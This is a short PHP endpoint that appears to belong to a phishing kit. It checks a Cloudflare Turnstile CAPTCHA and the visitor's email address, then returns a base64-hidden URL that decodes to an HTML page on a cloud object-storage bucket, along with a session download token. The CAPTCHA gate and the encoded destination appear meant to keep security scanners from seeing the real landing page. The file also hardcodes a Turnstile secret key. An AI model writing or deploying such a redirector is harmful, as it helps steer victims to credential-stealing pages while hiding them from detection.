/home/sweetnotes/www/digicloud/validate-captcha.php
<?php
header('Content-Type: application/json');
header('X-Content-Type-Options: nosniff');
header('X-Frame-Options: DENY');
define('TURNSTILE_SECRET', '0x4AAAAAACd6-LIUdzu6aRprUe4q34R_d_A');
session_start();
if (isset($_SESSION['last_request']) && $_SESSION['last_request'] > time() - 5) {
http_response_code(429);
die(json_encode(['success' => false, 'error' => 'Too many requests']));
}
if (!isset($_SERVER['HTTP_X_REQUESTED_WITH']) ||
strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) !== 'xmlhttprequest') {
http_response_code(403);
die(json_encode(['success' => false, 'error' => 'Forbidden']));
}
$data = json_decode(file_get_contents('php://input'), true);
$email = filter_var($data['email'] ?? '', FILTER_SANITIZE_EMAIL);
$captchaResponse = $data['captchaResponse'] ?? '';
if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
http_response_code(400);
die(json_encode(['success' => false, 'error' => 'Invalid email']));
}
$ch = curl_init('https://challenges.cloudflare.com/turnstile/v0/siteverify');
curl_setopt_array($ch, [
CURLOPT_POST => true,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POSTFIELDS => http_build_query([
'secret' => TURNSTILE_SECRET,
'response' => $captchaResponse,
'remoteip' => $_SERVER['REMOTE_ADDR']
])
]);
$result = json_decode(curl_exec($ch), true);
curl_close($ch);
if (empty($result['success'])) {
http_response_code(401);
die(json_encode([
'success' => false,
'error' => 'CAPTCHA validation failed',
'details' => $result['error-codes'] ?? []
]));
}
$type = 'docA';
$urls = [
'docA' => 'aHR0cHM6Ly9jbG91ZHB3bm90ZXMtbXMwcmVnaW9uYWwudXMtc2VhLTEubGlub2Rlb2JqZWN0cy5jb20vbWFpbi5odG1s',
'docB' => 'aHR0cHM6Ly9leGFtcGxlLmNvbS9kb3dubG9hZHMvZG9jQg=='
];
$encodedUrl = $urls[$type] ?? '';
$finalUrl = $encodedUrl ? base64_decode($encodedUrl) : '';
$uniqueToken = bin2hex(random_bytes(32));
$_SESSION['download_token'] = $uniqueToken;
$_SESSION['last_request'] = time();
echo json_encode([
'success' => true,
'uniqueToken' => $uniqueToken,
'finalUrl' => $finalUrl
]);